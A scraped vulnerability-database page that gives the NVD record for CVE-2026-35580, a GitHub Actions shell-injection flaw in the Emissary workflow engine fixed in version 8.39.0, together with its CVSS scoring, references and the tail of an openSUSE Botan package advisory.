            "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:Botan-doc-3.11.1-1.1.x86_64",
            "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:libbotan-3-11-3.11.1-1.1.x86_64",
            "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:libbotan-devel-3.11.1-1.1.x86_64",
            "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.aarch64",
            "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.s390x",
            "openSUSE Tumbleweed:python3-botan-3.11.1-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-04-14T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2026-35582"
    }
  ]
}

FKIE_CVE-2026-35580

Vulnerability from fkie_nvd - Published: 2026-04-07 17:16 - Updated: 2026-04-08 21:27

Severity ?

9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/NationalSecurityAgency/emissary/pull/1286
	security-advisories@github.com	https://github.com/NationalSecurityAgency/emissary/pull/1288
	security-advisories@github.com	https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Emissary is a P2P based data-driven workflow engine. Prior to 8.39.0, GitHub Actions workflow files contained shell injection points where user-controlled workflow_dispatch inputs were interpolated directly into shell commands via ${{ }} expression syntax. An attacker with repository write access could inject arbitrary shell commands, leading to repository poisoning and supply chain compromise affecting all downstream users. This vulnerability is fixed in 8.39.0."
    }
  ],
  "id": "CVE-2026-35580",
  "lastModified": "2026-04-08T21:27:00.663",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-07T17:16:33.307",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/NationalSecurityAgency/emissary/pull/1286"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/NationalSecurityAgency/emissary/pull/1288"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-35580 (GCVE-0-2026-35580)

GHSA-3G6G-GQ4R-XJM9

Summary

Affected Files

Details

Example — maven-version.yml (before fix)

Impact

Remediation

PR #1286 — Environment variable indirection

PR #1288 — Input validation

Workarounds

References

OPENSUSE-SU-2026:10540-1

FKIE_CVE-2026-35580

Tags

Sightings

Nomenclature

Example — `maven-version.yml` (before fix)